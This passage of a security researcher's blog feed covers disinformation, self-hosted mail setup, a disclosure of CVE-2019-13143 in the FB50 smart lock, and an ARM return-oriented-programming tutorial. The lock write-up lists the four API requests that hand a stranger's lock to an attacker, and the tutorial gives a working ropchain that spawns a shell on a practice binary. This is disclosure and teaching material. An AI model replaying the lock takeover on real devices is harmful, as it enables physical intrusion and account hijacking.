2640 this week linked to a video purportedly showing Hong Kong protesters using American-made grenade launchers to combat police.
2641 …</p>
2642</blockquote>
2643
2644<h2 id="media-used-to-disperse-disinfo">Media used to disperse disinfo</h2>
2645
2646<p>As seen in the above example of totalitarian governments, national TV and newspaper agencies
2647play a key role in influence ops en masse. It guarantees outreach due to the channel/paper’s
2648popularity.</p>
2649
2650<p>Twitter is another, obvious example. Due to the ease of creating accounts and the ability to
2651generate activity programmatically via the API, Twitter bots are the go-to choice today for
2652info ops. Essentially, an actor attempts to create “discussions” amongst “users” (read: bots),
2653to push their narrative(s). Twitter also provides analytics for every tweet, enabling actors to
2654get realtime insights into what sticks and what doesn’t.
2655The use of Twitter was seen during the previously discussed MH17 case, where Russia employed its troll
2656factory — the <a href="https://en.wikipedia.org/wiki/Internet_Research_Agency">Internet Research Agency</a> (IRA)
2657to create discussions about alternative theories.</p>
2658
2659<p>In India, disinformation is often spread via YouTube, WhatsApp and Facebook. Political parties
2660actively invest in creating group chats to spread political messages and memes. These parties
2661have volunteers whose sole job is to sit and forward messages.
2662Apart from political propaganda, WhatsApp finds itself as a medium of fake news. In most cases,
2663this is disinformation without a motive, or the motive is hard to determine simply because
2664the source is impossible to trace, lost in forwards.<sup class="footnote-ref" id="fnref-5"><a href="#fn-5">5</a></sup>
2665This is a difficult problem to combat, especially given the nature of the target audience.</p>
2666
2667<h2 id="the-actors-behind-disinfo-campaigns">The actors behind disinfo campaigns</h2>
2668
2669<p>I doubt this requires further elaboration, but in short:</p>
2670
2671<ul>
2672<li>nation states and their intelligence agencies</li>
2673<li>governments, political parties</li>
2674<li>other non/quasi-governmental groups</li>
2675<li>trolls</li>
2676</ul>
2677
2678<p>This essentially sums up the what, why, how and who of disinformation. </p>
2679
2680<h2 id="personal-opsec">Personal OPSEC</h2>
2681
2682<p>This is a fun one. Now, it’s common knowledge that
2683<strong>STFU is the best policy</strong>. But sometimes, this might not be possible, because
2684afterall inactivity leads to suspicion, and suspicion leads to scrutiny. Which might
2685lead to your OPSEC being compromised.
2686So if you really have to, you can feign activity using disinformation. For example,
2687pick a place, and throw in subtle details pertaining to the weather, local events
2688or regional politics of that place into your disinfo. Assuming this is Twitter, you can
2689tweet stuff like:</p>
2690
2691<ul>
2692<li>“Ugh, when will this hot streak end?!”</li>
2693<li>“Traffic wonky because of the Mardi Gras parade.”</li>
2694<li>“Woah, XYZ place is nice! Especially the fountains by ABC street.”</li>
2695</ul>
2696
2697<p>Of course, if you’re a nobody on Twitter (like me), this is a non-issue for you.</p>
2698
2699<p>And please, don’t do this:</p>
2700
2701<p><img src="/static/img/mcafeetweet.png" alt="mcafee opsecfail" /></p>
2702
2703<h2 id="conclusion">Conclusion</h2>
2704
2705<p>The ability to influence someone’s decisions/thought process in just one tweet is
2706scary. There is no simple way to combat disinformation. Social media is hard to control.
2707Just like anything else in cyber, this too is an endless battle between social media corps
2708and motivated actors.</p>
2709
2710<p>A huge shoutout to Bellingcat for their extensive research in this field, and for helping
2711folks see the truth in a post-truth world.</p>
2712
2713<div class="footnotes">
2714<hr />
2715<ol>
2716<li id="fn-1">
2717<p><a href="https://www.vice.com/en_us/article/ev3zmk/an-expert-explains-the-many-ways-our-elections-can-be-hacked">This</a> episode of CYBER talks about election influence ops (features the grugq!). <a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
2718</li>
2719
2720<li id="fn-2">
2721<p>The <a href="https://www.bellingcat.com/category/resources/podcasts/">Bellingcat Podcast</a>’s season one covers the MH17 investigation in detail. <a href="#fnref-2" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
2722</li>
2723
2724<li id="fn-3">
2725<p><a href="https://en.wikipedia.org/wiki/Malaysia_Airlines_Flight_17#Conspiracy_theories">Wikipedia section on MH17 conspiracy theories</a> <a href="#fnref-3" class="footnoteBackLink" title="Jump back to footnote 3 in the text.">↩</a></p>
2726</li>
2727
2728<li id="fn-4">
2729<p><a href="https://twitter.com/gdead/status/1171032265629032450">Chinese newspaper spreading disinfo</a> <a href="#fnref-4" class="footnoteBackLink" title="Jump back to footnote 4 in the text.">↩</a></p>
2730</li>
2731
2732<li id="fn-5">
2733<p>Use an adblocker before clicking <a href="https://www.news18.com/news/tech/fake-whatsapp-message-of-child-kidnaps-causing-mob-violence-in-madhya-pradesh-2252015.html">this</a>. <a href="#fnref-5" class="footnoteBackLink" title="Jump back to footnote 5 in the text.">↩</a></p>
2734</li>
2735</ol>
2736</div>
2737]]></description><link>https://icyphox.sh/blog/disinfo</link><pubDate>Tue, 10 Sep 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/disinfo</guid></item><item><title>Setting up my personal mailserver</title><description><![CDATA[<p>A mailserver was a long time coming. I’d made an attempt at setting one up
2738around ~4 years ago (ish), and IIRC, I quit when it came to DNS. And
2739I almost did this time too.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup></p>
2740
2741<p>For this attempt, I wanted a simpler approach. I recall how terribly
2742confusing Dovecot & Postfix were to configure and hence I decided to look
2743for a containerized solution, that most importantly, runs on my cheap $5
2744Digital Ocean VPS — 1 vCPU and 1 GB memory. Of which only around 500 MB
2745is actually available. So yeah, <em>pretty</em> tight.</p>
2746
2747<h2 id="whats-available">What’s available</h2>
2748
2749<p>Turns out, there are quite a few of these OOTB, ready to deply solutions.
2750These are the ones I came across:</p>
2751
2752<ul>
2753<li><p><a href="https://poste.io">poste.io</a>: Based on an “open core” model. The base install is open source
2754and free (as in beer), but you’ll have to pay for the extra stuff.</p></li>
2755<li><p><a href="https://mailu.io">mailu.io</a>: Free software. Draws inspiration from poste.io,
2756but ships with a web UI that I didn’t need. </p></li>
2757<li><p><a href="https://mailcow.email">mailcow.email</a>: These fancy domains are getting ridiculous. But more importantly
2758they need 2 GiB of RAM <em>plus</em> swap?! Nope.</p></li>
2759<li><p><a href="https://mailinabox.email">Mail-in-a-Box</a>: Unlike the ones above, not a Docker-based solution but definitely worth
2760a mention. It however, needs a fresh box to work with. A box with absolutely
2761nothing else on it. I can’t afford to do that.</p></li>
2762<li><p><a href="https://github.com/tomav/docker-mailserver/">docker-mailserver</a>: <strong>The winner</strong>. </p></li>
2763</ul>
2764
2765<h2 id="so-docker-mailserver">So… <code>docker-mailserver</code></h2>
2766
2767<p>The first thing that caught my eye in the README:</p>
2768
2769<blockquote>
2770 <p>Recommended:</p>
2771
2772 <ul>
2773 <li>1 CPU</li>
2774 <li>1GB RAM</li>
2775 </ul>
2776
2777 <p>Minimum:</p>
2778
2779 <ul>
2780 <li>1 CPU</li>
2781 <li>512MB RAM</li>
2782 </ul>
2783</blockquote>
2784
2785<p>Fantastic, I can somehow squeeze this into my existing VPS.
2786Setup was fairly simple & the docs are pretty good. It employs a single
2787<code>.env</code> file for configuration, which is great.
2788However, I did run into a couple of hiccups here and there.</p>
2789
2790<p>One especially nasty one was <code>docker</code> / <code>docker-compose</code> running out
2791of memory.</p>
2792
2793<pre><code>Error response from daemon: cannot stop container: 2377e5c0b456: Cannot kill container 2377e5c0b456226ecaa66a5ac18071fc5885b8a9912feeefb07593638b9a40d1: OCI runtime state failed: runc did not terminate sucessfully: fatal error: runtime: out of memory
2794</code></pre>
2795
2796<p>But it eventually worked after a couple of attempts.</p>
2797
2798<p>The next thing I struggled with — DNS. Specifically, the with the step where
2799the DKIM keys are generated<sup class="footnote-ref" id="fnref-2"><a href="#fn-2">2</a></sup>. The output under <br />
2800<code>config/opendkim/keys/domain.tld/mail.txt</code> <br />
2801isn’t exactly CloudFlare friendly; they can’t be directly copy-pasted into
2802a <code>TXT</code> record. </p>
2803
2804<p>This is what it looks like.</p>
2805
2806<pre><code>mail._domainkey IN TXT ( "v=DKIM1; h=sha256; k=rsa; "
2807 "p=<key>"
2808 "<more key>" ) ; ----- DKIM key mail for icyphox.sh
2809</code></pre>
2810
2811<p>But while configuring the record, you set “Type” to <code>TXT</code>, “Name” to <code>mail._domainkey</code>,
2812and the “Value” to what’s inside the parenthesis <code>( )</code>, <em>removing</em> the quotes <code>""</code>.
2813Also remove the part that appears to be a comment <code>; ----- ...</code>.</p>
2814
2815<p>To simplify debugging DNS issues later, it’s probably a good idea to
2816point to your mailserver using a subdomain like <code>mail.domain.tld</code> using an
2817<code>A</code> record.
2818You’ll then have to set an <code>MX</code> record with the “Name” as <code>@</code> (or whatever your DNS provider
2819uses to denote the root domain) and the “Value” to <code>mail.domain.tld</code>.
2820And finally, the <code>PTR</code> (pointer record, I think), which is the reverse of
2821your <code>A</code> record — “Name” as the server IP and “Value” as <code>mail.domain.tld</code>.
2822I learnt this part the hard way, when my outgoing email kept getting
2823rejected by Tutanota’s servers.</p>
2824
2825<p>Yet another hurdle — SSL/TLS certificates. This isn’t very properly
2826documented, unless you read through the <a href="https://github.com/tomav/docker-mailserver/wiki/Installation-Examples">wiki</a>
2827and look at an example. In short, install <code>certbot</code>, have port 80 free,
2828and run </p>
2829
2830<div class="codehilite"><pre><span></span><code>$ certbot certonly --standalone -d mail.domain.tld
2831</code></pre></div>
2832
2833<p>Once that’s done, edit the <code>docker-compose.yml</code> file to mount <code>/etc/letsencrypt</code> in
2834the container, something like so:</p>
2835
2836<div class="codehilite"><pre><span></span><code><span class="nn">...</span>
2837
2838<span class="nt">volumes</span><span class="p">:</span>
2839 <span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">maildata:/var/mail</span>
2840 <span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">mailstate:/var/mail-state</span>
2841 <span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">./config/:/tmp/docker-mailserver/</span>
2842 <span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">/etc/letsencrypt:/etc/letsencrypt</span>
2843
2844<span class="nn">...</span>
2845</code></pre></div>
2846
2847<p>With this done, you shouldn’t have mail clients complaining about
2848wonky certs for which you’ll have to add an exception manually.</p>
2849
2850<h2 id="why-would-you">Why would you…?</h2>
2851
2852<p>There are a few good reasons for this:</p>
2853
2854<h3 id="privacy">Privacy</h3>
2855
2856<p>No really, this is <em>the</em> best choice for truly private
2857email. Not ProtonMail, not Tutanota. Sure, they claim so and I don’t
2858dispute it. Quoting Drew Devault<sup class="footnote-ref" id="fnref-3"><a href="#fn-3">3</a></sup>,</p>
2859
2860<blockquote>
2861 <p>Truly secure systems do not require you to trust the service provider.</p>
2862</blockquote>
2863
2864<p>But you have to <em>trust</em> ProtonMail. They run open source software, but
2865how can you really be sure that it isn’t a backdoored version of it?</p>
2866
2867<p>When you host your own mailserver, you truly own your email without having to rely on any
2868third-party.
2869This isn’t an attempt to spread FUD. In the end, it all depends on your
2870threat model™.</p>
2871
2872<h3 id="decentralization">Decentralization</h3>
2873
2874<p>Email today is basically run by Google. Gmail has over 1.2 <em>billion</em>
2875active users. That’s obscene.
2876Email was designed to be decentralized but big corps swooped in and
2877made it a product. They now control your data, and it isn’t unknown that
2878Google reads your mail. This again loops back to my previous point, privacy.
2879Decentralization guarantees privacy. When you control your mail, you subsequently
2880control who reads it.</p>
2881
2882<h3 id="personalization">Personalization</h3>
2883
2884<p>Can’t ignore this one. It’s cool to have a custom email address to flex.</p>
2885
2886<p><code>x@icyphox.sh</code> vs <code>gabe.newell4321@gmail.com</code></p>
2887
2888<p>Pfft, this is no competition.</p>
2889
2890<div class="footnotes">
2891<hr />
2892<ol>
2893<li id="fn-1">
2894<p>My <a href="https://twitter.com/icyphox/status/1161648321548566528">tweet</a> of frustration. <a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
2895</li>
2896
2897<li id="fn-2">
2898<p><a href="https://github.com/tomav/docker-mailserver#generate-dkim-keys">Link</a> to step in the docs. <a href="#fnref-2" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
2899</li>
2900
2901<li id="fn-3">
2902<p>From his <a href="https://drewdevault.com/2018/08/08/Signal.html">article</a> on why he doesn’t trust Signal. <a href="#fnref-3" class="footnoteBackLink" title="Jump back to footnote 3 in the text.">↩</a></p>
2903</li>
2904</ol>
2905</div>
2906]]></description><link>https://icyphox.sh/blog/mailserver</link><pubDate>Thu, 15 Aug 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/mailserver</guid></item><item><title>Picking the FB50 smart lock (CVE-2019-13143)</title><description><![CDATA[<p>(<em>originally posted at <a href="http://blog.securelayer7.net/fb50-smart-lock-vulnerability-disclosure">SecureLayer7’s Blog</a>, with my edits</em>)</p>
2907
2908<h2 id="the-lock">The lock</h2>
2909
2910<p>The lock in question is the FB50 smart lock, manufactured by Shenzhen
2911Dragon Brother Technology Co. Ltd. This lock is sold under multiple brands
2912across many ecommerce sites, and has over, an estimated, 15k+ users.</p>
2913
2914<p>The lock pairs to a phone via Bluetooth, and requires the OKLOK app from
2915the Play/App Store to function. The app requires the user to create an
2916account before further functionality is available.
2917It also facilitates configuring the fingerprint,
2918and unlocking from a range via Bluetooth.</p>
2919
2920<p>We had two primary attack surfaces we decided to tackle—Bluetooth (BLE)
2921and the Android app.</p>
2922
2923<h2 id="via-bluetooth-low-energy-ble">Via Bluetooth Low Energy (BLE)</h2>
2924
2925<p>Android phones have the ability to capture Bluetooth (HCI) traffic
2926which can be enabled under Developer Options under Settings. We made
2927around 4 “unlocks” from the Android phone, as seen in the screenshot.</p>
2928
2929<p><img src="/static/img/bt_wireshark.png" alt="wireshark packets" /></p>
2930
2931<p>This is the value sent in the <code>Write</code> request:</p>
2932
2933<p><img src="/static/img/bt_ws_value.png" alt="wireshark write req" /></p>
2934
2935<p>We attempted replaying these requests using <code>gattool</code> and <code>gattacker</code>,
2936but that didn’t pan out, since the value being written was encrypted.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup></p>
2937
2938<h2 id="via-the-android-app">Via the Android app</h2>
2939
2940<p>Reversing the app using <code>jd-gui</code>, <code>apktool</code> and <code>dex2jar</code> didn’t get us too
2941far since most of it was obfuscated. Why bother when there exists an
2942easier approach—BurpSuite.</p>
2943
2944<p>We captured and played around with a bunch of requests and responses,
2945and finally arrived at a working exploit chain.</p>
2946
2947<h2 id="the-exploit">The exploit</h2>
2948
2949<p>The entire exploit is a 4 step process consisting of authenticated
2950HTTP requests:</p>
2951
2952<ol>
2953<li>Using the lock’s MAC (obtained via a simple Bluetooth scan in the
2954vicinity), get the barcode and lock ID</li>
2955<li>Using the barcode, fetch the user ID</li>
2956<li>Using the lock ID and user ID, unbind the user from the lock</li>
2957<li>Provide a new name, attacker’s user ID and the MAC to bind the attacker
2958to the lock</li>
2959</ol>
2960
2961<p>This is what it looks like, in essence (personal info redacted).</p>
2962
2963<h3 id="request-1">Request 1</h3>
2964
2965<pre><code>POST /oklock/lock/queryDevice
2966{"mac":"XX:XX:XX:XX:XX:XX"}
2967</code></pre>
2968
2969<p>Response:</p>
2970
2971<pre><code>{
2972 "result":{
2973 "alarm":0,
2974 "barcode":"<BARCODE>",
2975 "chipType":"1",
2976 "createAt":"2019-05-14 09:32:23.0",
2977 "deviceId":"",
2978 "electricity":"95",
2979 "firmwareVersion":"2.3",
2980 "gsmVersion":"",
2981 "id":<LOCK ID>,
2982 "isLock":0,
2983 "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
2984 "lockPwd":"000000",
2985 "mac":"XX:XX:XX:XX:XX:XX",
2986 "name":"lock",
2987 "radioName":"BlueFPL",
2988 "type":0
2989 },
2990 "status":"2000"
2991}
2992</code></pre>
2993
2994<h3 id="request-2">Request 2</h3>
2995
2996<pre><code>POST /oklock/lock/getDeviceInfo
2997
2998{"barcode":"https://app.oklok.com.cn/app.html?id=<BARCODE>"}
2999</code></pre>
3000
3001<p>Response:</p>
3002
3003<pre><code> "result":{
3004 "account":"email@some.website",
3005 "alarm":0,
3006 "barcode":"<BARCODE>",
3007 "chipType":"1",
3008 "createAt":"2019-05-14 09:32:23.0",
3009 "deviceId":"",
3010 "electricity":"95",
3011 "firmwareVersion":"2.3",
3012 "gsmVersion":"",
3013 "id":<LOCK ID>,
3014 "isLock":0,
3015 "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
3016 "lockPwd":"000000",
3017 "mac":"XX:XX:XX:XX:XX:XX",
3018 "name":"lock",
3019 "radioName":"BlueFPL",
3020 "type":0,
3021 "userId":<USER ID>
3022 }
3023</code></pre>
3024
3025<h3 id="request-3">Request 3</h3>
3026
3027<pre><code>POST /oklock/lock/unbind
3028
3029{"lockId":"<LOCK ID>","userId":<USER ID>}
3030</code></pre>
3031
3032<h3 id="request-4">Request 4</h3>
3033
3034<pre><code>POST /oklock/lock/bind
3035
3036{"name":"newname","userId":<USER ID>,"mac":"XX:XX:XX:XX:XX:XX"}
3037</code></pre>
3038
3039<h2 id="thats-it-the-scary-stuff">That’s it! (& the scary stuff)</h2>
3040
3041<p>You should have the lock transferred to your account. The severity of this
3042issue lies in the fact that the original owner completely loses access to
3043their lock. They can’t even “rebind” to get it back, since the current owner
3044(the attacker) needs to authorize that. </p>
3045
3046<p>To add to that, roughly 15,000 user accounts’ info are exposed via IDOR.
3047Ilja, a cool dude I met on Telegram, noticed locks named “carlock”,
3048“garage”, “MainDoor”, etc.<sup class="footnote-ref" id="fnref-2"><a href="#fn-2">2</a></sup> This is terrifying.</p>
3049
3050<p><em>shudders</em></p>
3051
3052<h2 id="proof-of-concept">Proof of Concept</h2>
3053
3054<p><a href="https://twitter.com/icyphox/status/1158396372778807296">PoC Video</a></p>
3055
3056<p><a href="https://github.com/icyphox/pwnfb50">Exploit code</a></p>
3057
3058<h2 id="disclosure-timeline">Disclosure timeline</h2>
3059
3060<ul>
3061<li><strong>26th June, 2019</strong>: Issue discovered at SecureLayer7, Pune</li>
3062<li><strong>27th June, 2019</strong>: Vendor notified about the issue</li>
3063<li><strong>2nd July, 2019</strong>: CVE-2019-13143 reserved</li>
3064<li>No response from vendor</li>
3065<li><strong>2nd August 2019</strong>: Public disclosure</li>
3066</ul>
3067
3068<h2 id="lessons-learnt">Lessons learnt</h2>
3069
3070<p><strong>DO NOT</strong>. Ever. Buy. A smart lock. You’re better off with the “dumb” ones
3071with keys. With the IoT plague spreading, it brings in a large attack surface
3072to things that were otherwise “unhackable” (try hacking a “dumb” toaster).</p>
3073
3074<p>The IoT security scene is rife with bugs from over 10 years ago, like
3075executable stack segments<sup class="footnote-ref" id="fnref-3"><a href="#fn-3">3</a></sup>, hardcoded keys, and poor development
3076practices in general.</p>
3077
3078<p>Our existing threat models and scenarios have to be updated to factor
3079in these new exploitation possibilities. This also broadens the playing
3080field for cyber warfare and mass surveillance campaigns. </p>
3081
3082<h2 id="researcher-info">Researcher info</h2>
3083
3084<p>This research was done at <a href="https://securelayer7.net">SecureLayer7</a>, Pune, IN by:</p>
3085
3086<ul>
3087<li>Anirudh Oppiliappan (me)</li>
3088<li>S. Raghav Pillai (<a href="https://twitter.com/_vologue">@_vologue</a>)</li>
3089<li>Shubham Chougule (<a href="https://twitter.com/shubhamtc">@shubhamtc</a>)</li>
3090</ul>
3091
3092<div class="footnotes">
3093<hr />
3094<ol>
3095<li id="fn-1">
3096<p><a href="https://www.pentestpartners.com/security-blog/pwning-the-nokelock-api/">This</a> article discusses a similar smart lock, but they broke the encryption. <a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
3097</li>
3098
3099<li id="fn-2">
3100<p>Thanks to Ilja Shaposhnikov (@drakylar). <a href="#fnref-2" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
3101</li>
3102
3103<li id="fn-3">
3104<p><a href="https://gsec.hitb.org/materials/sg2015/whitepapers/Lyon%20Yang%20-%20Advanced%20SOHO%20Router%20Exploitation.pdf">PDF</a> <a href="#fnref-3" class="footnoteBackLink" title="Jump back to footnote 3 in the text.">↩</a></p>
3105</li>
3106</ol>
3107</div>
3108]]></description><link>https://icyphox.sh/blog/fb50</link><pubDate>Mon, 05 Aug 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/fb50</guid></item><item><title>Return Oriented Programming on ARM (32-bit)</title><description><![CDATA[<p>Before we start <em>anything</em>, you’re expected to know the basics of ARM
3109assembly to follow along. I highly recommend
3110<a href="https://twitter.com/fox0x01">Azeria’s</a> series on <a href="https://azeria-labs.com/writing-arm-assembly-part-1/">ARM Assembly
3111Basics</a>. Once you’re
3112comfortable with it, proceed with the next bit—environment setup.</p>
3113
3114<h2 id="setup">Setup</h2>
3115
3116<p>Since we’re working with the ARM architecture, there are two options to go
3117forth with: </p>
3118
3119<ol>
3120<li>Emulate—head over to <a href="https://www.qemu.org/download/">qemu.org/download</a> and install QEMU.
3121And then download and extract the ARMv6 Debian Stretch image from one of the links <a href="https://blahcat.github.io/qemu/">here</a>.
3122The scripts found inside should be self-explanatory.</li>
3123<li>Use actual ARM hardware, like an RPi.</li>
3124</ol>
3125
3126<p>For debugging and disassembling, we’ll be using plain old <code>gdb</code>, but you
3127may use <code>radare2</code>, IDA or anything else, really. All of which can be
3128trivially installed.</p>
3129
3130<p>And for the sake of simplicity, disable ASLR:</p>
3131
3132<div class="codehilite"><pre><span></span><code>$ <span class="nb">echo</span> <span class="m">0</span> > /proc/sys/kernel/randomize_va_space
3133</code></pre></div>
3134
3135<p>Finally, the binary we’ll be using in this exercise is <a href="https://twitter.com/bellis1000">Billy Ellis’</a>
3136<a href="/static/files/roplevel2.c">roplevel2</a>. </p>
3137
3138<p>Compile it:</p>
3139
3140<div class="codehilite"><pre><span></span><code>$ gcc roplevel2.c -o rop2
3141</code></pre></div>
3142
3143<p>With that out of the way, here’s a quick run down of what ROP actually is.</p>
3144
3145<h2 id="a-primer-on-rop">A primer on ROP</h2>
3146
3147<p>ROP or Return Oriented Programming is a modern exploitation technique that’s
3148used to bypass protections like the <strong>NX bit</strong> (no-execute bit) and <strong>code sigining</strong>.
3149In essence, no code in the binary is actually modified and the entire exploit
3150is crafted out of pre-existing artifacts within the binary, known as <strong>gadgets</strong>.</p>
3151
3152<p>A gadget is essentially a small sequence of code (instructions), ending with
3153a <code>ret</code>, or a return instruction. In our case, since we’re dealing with ARM
3154code, there is no <code>ret</code> instruction but rather a <code>pop {pc}</code> or a <code>bx lr</code>.
3155These gadgets are <em>chained</em> together by jumping (returning) from one onto the other
3156to form what’s called as a <strong>ropchain</strong>. At the end of a ropchain,
3157there’s generally a call to <code>system()</code>, to acheive code execution.</p>
3158
3159<p>In practice, the process of executing a ropchain is something like this:</p>
3160
3161<ul>
3162<li>confirm the existence of a stack-based buffer overflow</li>
3163<li>identify the offset at which the instruction pointer gets overwritten</li>
3164<li>locate the addresses of the gadgets you wish to use</li>
3165<li>craft your input keeping in mind the stack’s layout, and chain the addresses
3166of your gadgets</li>
3167</ul>
3168
3169<p><a href="https://twitter.com/LiveOverflow">LiveOverflow</a> has a <a href="https://www.youtube.com/watch?v=zaQVNM3or7k&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&index=46&t=0s">beautiful video</a> where he explains ROP using “weird machines”.
3170Check it out, it might be just what you needed for that “aha!” moment :)</p>
3171
3172<p>Still don’t get it? Don’t fret, we’ll look at <em>actual</em> exploit code in a bit and hopefully
3173that should put things into perspective.</p>
3174
3175<h2 id="exploring-our-binary">Exploring our binary</h2>
3176
3177<p>Start by running it, and entering any arbitrary string. On entering a fairly
3178large string, say, “A” × 20, we
3179see a segmentation fault occur.</p>
3180
3181<p><img src="/static/img/string_segfault.png" alt="string and segfault" /></p>
3182
3183<p>Now, open it up in <code>gdb</code> and look at the functions inside it.</p>
3184
3185<p><img src="/static/img/gdb_functions.png" alt="gdb functions" /></p>
3186
3187<p>There are three functions that are of importance here, <code>main</code>, <code>winner</code> and
3188<code>gadget</code>. Disassembling the <code>main</code> function:</p>
3189
3190<p><img src="/static/img/gdb_main_disas.png" alt="gdb main disassembly" /></p>
3191
3192<p>We see a buffer of 16 bytes being created (<code>sub sp, sp, #16</code>), and some calls
3193to <code>puts()</code>/<code>printf()</code> and <code>scanf()</code>. Looks like <code>winner</code> and <code>gadget</code> are
3194never actually called.</p>
3195
3196<p>Disassembling the <code>gadget</code> function:</p>
3197
3198<p><img src="/static/img/gdb_gadget_disas.png" alt="gdb gadget disassembly" /></p>
3199
3200<p>This is fairly simple, the stack is being initialized by <code>push</code>ing <code>{r11}</code>,
3201which is also the frame pointer (<code>fp</code>). What’s interesting is the <code>pop {r0, pc}</code>
3202instruction in the middle. This is a <strong>gadget</strong>.</p>
3203
3204<p>We can use this to control what goes into <code>r0</code> and <code>pc</code>. Unlike in x86 where
3205arguments to functions are passed on the stack, in ARM the registers <code>r0</code> to <code>r3</code>
3206are used for this. So this gadget effectively allows us to pass arguments to
3207functions using <code>r0</code>, and subsequently jumping to them by passing its address
3208in <code>pc</code>. Neat.</p>
3209
3210<p>Moving on to the disassembly of the <code>winner</code> function:</p>
3211
3212<p><img src="/static/img/gdb_disas_winner.png" alt="gdb winner disassembly" /></p>
3213
3214<p>Here, we see a calls to <code>puts()</code>, <code>system()</code> and finally, <code>exit()</code>.
3215So our end goal here is to, quite obviously, execute code via the <code>system()</code>
3216function.</p>
3217
3218<p>Now that we have an overview of what’s in the binary, let’s formulate a method
3219of exploitation by messing around with inputs.</p>
3220
3221<h2 id="messing-around-with-inputs">Messing around with inputs :^)</h2>
3222
3223<p>Back to <code>gdb</code>, hit <code>r</code> to run and pass in a patterned input, like in the
3224screenshot.</p>
3225
3226<p><img src="/static/img/gdb_info_reg_segfault.png" alt="gdb info reg post segfault" /></p>
3227
3228<p>We hit a segfault because of invalid memory at address <code>0x46464646</code>. Notice
3229the <code>pc</code> has been overwritten with our input.
3230So we smashed the stack alright, but more importantly, it’s at the letter ‘F’.</p>
3231
3232<p>Since we know the offset at which the <code>pc</code> gets overwritten, we can now
3233control program execution flow. Let’s try jumping to the <code>winner</code> function.</p>
3234
3235<p>Disassemble <code>winner</code> again using <code>disas winner</code> and note down the offset
3236of the second instruction—<code>add r11, sp, #4</code>.
3237For this, we’ll use Python to print our input string replacing <code>FFFF</code> with
3238the address of <code>winner</code>. Note the endianness.</p>
3239
3240<div class="codehilite"><pre><span></span><code>$ python -c <span class="s1">'print("AAAABBBBCCCCDDDDEEEE\x28\x05\x01\x00")'</span> <span class="p">|</span> ./rop2
3241</code></pre></div>
3242
3243<p><img src="/static/img/python_winner_jump.png" alt="jump to winner" /></p>
3244
3245<p>The reason we don’t jump to the first instruction is because we want to control the stack
3246ourselves. If we allow <code>push {rll, lr}</code> (first instruction) to occur, the program will <code>pop</code>
3247those out after <code>winner</code> is done executing and we will no longer control
3248where it jumps to.</p>
3249
3250<p>So that didn’t do much, just prints out a string “Nothing much here…”.
3251But it <em>does</em> however, contain <code>system()</code>. Which somehow needs to be populated with an argument
3252to do what we want (run a command, execute a shell, etc.).</p>
3253
3254<p>To do that, we’ll follow a multi-step process: </p>
3255
3256<ol>
3257<li>Jump to the address of <code>gadget</code>, again the 2nd instruction. This will <code>pop</code> <code>r0</code> and <code>pc</code>.</li>
3258<li>Push our command to be executed, say “<code>/bin/sh</code>” onto the stack. This will go into
3259<code>r0</code>.</li>
3260<li>Then, push the address of <code>system()</code>. And this will go into <code>pc</code>.</li>
3261</ol>
3262
3263<p>The pseudo-code is something like this:</p>
3264
3265<pre><code>string = AAAABBBBCCCCDDDDEEEE
3266gadget = # addr of gadget
3267binsh = # addr of /bin/sh
3268system = # addr of system()
3269
3270print(string + gadget + binsh + system)
3271</code></pre>
3272
3273<p>Clean and mean.</p>
3274
3275<h2 id="the-exploit">The exploit</h2>
3276
3277<p>To write the exploit, we’ll use Python and the absolute godsend of a library—<code>struct</code>.
3278It allows us to pack the bytes of addresses to the endianness of our choice.
3279It probably does a lot more, but who cares.</p>
3280
3281<p>Let’s start by fetching the address of <code>/bin/sh</code>. In <code>gdb</code>, set a breakpoint
3282at <code>main</code>, hit <code>r</code> to run, and search the entire address space for the string “<code>/bin/sh</code>”:</p>
3283
3284<pre><code>(gdb) find &system, +9999999, "/bin/sh"
3285</code></pre>
3286
3287<p><img src="/static/img/gdb_find_binsh.png" alt="gdb finding /bin/sh" /></p>
3288
3289<p>One hit at <code>0xb6f85588</code>. The addresses of <code>gadget</code> and <code>system()</code> can be
3290found from the disassmblies from earlier. Here’s the final exploit code:</p>
3291
3292<div class="codehilite"><pre><span></span><code><span class="kn">import</span> <span class="nn">struct</span>
3293
3294<span class="n">binsh</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">"I"</span><span class="p">,</span> <span class="mh">0xb6f85588</span><span class="p">)</span>
3295<span class="n">string</span> <span class="o">=</span> <span class="s2">"AAAABBBBCCCCDDDDEEEE"</span>
3296<span class="n">gadget</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">"I"</span><span class="p">,</span> <span class="mh">0x00010550</span><span class="p">)</span>
3297<span class="n">system</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">"I"</span><span class="p">,</span> <span class="mh">0x00010538</span><span class="p">)</span>
3298
3299<span class="nb">print</span><span class="p">(</span><span class="n">string</span> <span class="o">+</span> <span class="n">gadget</span> <span class="o">+</span> <span class="n">binsh</span> <span class="o">+</span> <span class="n">system</span><span class="p">)</span>
3300</code></pre></div>
3301
3302<p>Honestly, not too far off from our pseudo-code :)</p>
3303
3304<p>Let’s see it in action:</p>
3305
3306<p><img src="/static/img/the_shell.png" alt="the shell!" /></p>
3307
